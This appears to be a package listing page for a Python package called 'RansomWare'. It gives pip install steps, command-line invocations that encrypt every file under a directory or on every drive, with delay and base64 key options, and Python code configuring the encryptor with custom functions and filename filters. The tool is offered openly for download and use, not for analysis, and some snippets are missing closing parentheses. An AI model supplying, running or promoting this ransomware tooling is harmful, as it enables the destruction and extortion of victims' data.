RansomWare 0.0.1

Creator: bigcodingguy24

Last updated:

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RansomWare 0.0.1

This package implement a RansomWare.
This package require :

python3 Standard Library

pip install RansomWare

Command line:
RansomWare aaa # Crypt all files in current directory and subdirectories with XOR and key aaa
RansomWare -t 56 aaa # Crypt all files in current directory and subdirectories with XOR and key aaa and sleep 56 secondes between file.
RansomWare -e 64 YWFh # Crypt all files in current directory and subdirectories with XOR and key aaa (encoded with base64)
RansomWare -d dir aaa # Crypt all files in dir and subdirectories with XOR and key aaa
RansomWare -a aaa # Encrypt all files on Windows this argument encrypt "A:\", "B:\", "C:\", ... "Z:\". On Linux this argument replace directory by "/".

Python script
from RansomWare import RansomWare

def get_IV(filename: str) -> bytes:
""" This function return my custom IV. """
return filename.encode()

def crypt(key: bytes, data:bytes) -> bytes:
""" This function encrypt data with key. """
return bytes([(car + key[i % len(key)]) % 256 for i, car in enumerate(data)])

def decrypt(key: bytes, data:bytes) -> bytes:
""" This function decrypt data with key. """
return bytes([(car - key[i % len(key)]) % 256 for i, car in enumerate(data)])

cryptolocker = RansomWare(
b"aaa", # Key
function_encrypt = crypt, # function to encrypt from key and data
function_IV = get_IV, # function to get IV from filename
directory = "dir", # directory to encrypt
timeBetweenCrypt = 5, # time to sleep between encrypt files
regexs_filename_to_encrypt = [".*txt", ".*ini"], # encrypt file if filename match with this regex
regexs_filename_dont_encrypt = ["^/bin.*"], # don't encrypt file if filename match with this regex

unlock = RansomWare(
b"aaa", # Key
function_encrypt = decrypt, # function to decrypt from key and data
function_IV = get_IV, # function to get IV from filename
directory = "dir", # directory to decrypt
timeBetweenCrypt = 5, # time to sleep between decrypt files
regexs_filename_to_encrypt = [".*txt", ".*ini"], # decrypt file if filename match with this regex
regexs_filename_dont_encrypt = ["^/bin.*"], # don't decrypt file if filename match with this regex

Python executable:
python3 RansomWare.pyz -t 5 -d dir -e 64 YWFh

# OR
chmod u+x RansomWare.pyz # add execute rights
./RansomWare.pyz aaa # execute file

Python module (command line):
python3 -m RansomWare aaa
python3 -m RansomWare.RansomWare -t 5 -d dir -e 64 YWFh


Github Page
Download as python executable
Pypi package

Licensed under the GPL, version 3.


For personal and professional use. You cannot resell or redistribute these repositories in their original state.

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